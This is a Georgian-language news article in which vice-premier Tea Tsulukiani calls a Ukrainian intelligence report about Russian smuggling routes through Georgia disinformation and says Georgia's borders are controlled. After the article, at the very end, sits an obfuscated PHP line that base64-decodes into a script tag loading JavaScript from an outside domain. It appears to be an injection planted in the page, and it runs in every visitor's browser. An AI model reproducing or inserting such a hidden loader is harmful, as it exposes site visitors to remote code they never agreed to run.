celsiusi
ავერსი საქკაბელი
საქართველოს კულტურის მინისტრი და ვიცე-პრემიერი თეა წულუკიანი უკრაინის თავდაცვის სამინისტროს დაზვერვის სამსახურის განცხადებას გამოეხმაურა და "გაუგონარი დეზინფორმაცია" უწოდა.
 
მისივე თქმით, საქართველოს საზღვრები მკაცრად კონტროლირდება. მან ასევე აღნიშნა, რომ ისურვებდა უკრაინელები არ აჰყვნენ საქართველოდან გაქცეულ ძებნილ კოლექტიურ გია ლორთქიფანიძეებს.  
 
"გუშინ ვნახეთ გაუგონარი დეზინფორმაცია, თითქოს რუსეთის ფედერაცია მართავს, თუ აწყობს არხებს იმისთვის, რომ საქართველოს ტერიტორია გამოიყენოს გარკვეული ტიპის კონტრაბანდისთვის, რაც კიდევ უფრო მნიშვნელოვანია ჩემთვის, ჩვენ ვნახეთ უკრაინის ვიცე-პრემიერის, ირინა ვერეშჩუკის ძალიან ემოციური, ტკივილით დატვირთული ვიდეომიმართვა ქართველი ხალხისადმი, რომელშიც ის ეკითხება ქართველ ხალხს, რა დაგიშავეთ ასეთი, რომ ასეთი მთავრობა გყავთო?! მოკლედ ეს იყო რეზიუმე იმ ძალიან ძნელად მოსასმენი, ბევრი წუხილითა და გაუსაძლისი ტკივილით დატვირთული ვიდეო-მიმართვისა. ამ მიმართვისას ქალბატონმა ვიცე-პრემიერმა განაცხადა, რომ საუბრობდა როგორც თავისი ქვეყნის მოქალაქე და მისივე სახელმწიფოს ვიცე პრემიერ-მინისტრი. გამოდის, რომ მეც მიწევს ამაზე საუბარი როგორც ჩემი ქვეყნის მოქალაქეს და ჩემი ქვეყნის მთავრობის ვიცე-პრემიერს. მინდა, მათ კიდევ ერთხელ მივმართო, ქალბატონ ვერეშჩუკს და ასევე ჩვენთვის ძალზე ძვირფას უკრაინელ ხალხს. კიდევ ერთხელ გავიზიარო ჩემი მთავრობის, მთელი ჩვენი ხალხის სახელით ის დიდი ტკივილი, ვინაიდან საქმე გვაქვს ენით აღუწერელ სისასტიკეებთან.
 
სამწუხაროა, რომ პატარა საქართველოს არ შეუძლია, შეაჩეროს ეს ომი, რომლის შეჩერებაც დიდმა და ძლევამოსილმა ქვეყნებმა დღემდე ვერ შეძლეს. მინდა, ქალბატონ ვერეშჩუკს ვუთხრა. ძვირფასო კოლეგავ, მინდა, გჯეროდეთ და გარწმუნებთ, საქართველოს საზღვრები კონტროლდება. ამის შესახებ ოფიციალური განცხადებაც გაავრცელა საქართველოს ფინანსთა სამინისტრომ და ეს საზღვრები კონტროლდება სწორედ იმისთვის, რომ ნებისმიერი სანქცირებული, იქნება ეს სამხედრო, ორმაგი დანიშნულების მასალა, თუ საქონელი, არ ასცდეს მკაცრ საბაჟო მონიტორინგს ჩვენს საზღვრებზე. ეს არის რეალობა, დანარჩენი ყველაფერი არის ბინძური ტყუილი. ჩვენი ბრალი ვერ იქნება, თუ უკრაინა სამწუხაროდ ჯერ კიდევ ჩემი იუსტიციის მინისტრობის პერიოდში გადაიქცა საქართველოდან გაქცეული კრიმინალების ნაკრძალად. ამიტომაც, მე ვისურვებდი, რომ უკრაინის მთავრობა არ აჰყვეს კრიმინალებს, მათ ნაამბობს, რაც არ უნდა ძნელი იყოს ომის პირობებში სიმართლისა და ტყუილის გარჩევა ხანდახან. ვისურვებდი, რომ ისინი არ აჰყვნენ სწორედ ჩვენგან გაქცეულ ძებნილ კოლექტიურ გია ლორთქიფანიძეებს, რომლებიც უარს ამბობენ ისეთ სისასტიკეებზე აგონ პასუხი, რომლებიც საკუთარი ხალხის წინაშე ჩაიდინეს და ითანაშრომლონ არა ჩვენგან გაქცეულ რადიკალურ ოპოზიციასთან, არამედ საქართველოს მთავრობასთან, ვინაიდან, საქართველოს ხალხი და მის მიერ დემოკრატიულად არჩეული მთავრობა არის უკრაინისა და უკრაინელი ხალხის ძალიან ერთგული მეგობარი, ამას ჩვენი ხალხი და მთავრობა ყოველდღიური საქმიანობისას ფაქტებით ამტკიცებს," - აღნიშნა წულუკიანმა.
 
შეგახსენებთ, რომ უკრაინის თავდაცვის სამინისტროს მთავარი სადაზვერვო სამმართველოს გუშინ გავრცელებული ინფორმაციით, რუსები აყალიბებენ არხს საქართველოს გავლით, ყალბი საქონლის კონტრაბანდისთვის. 
 
 
970
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");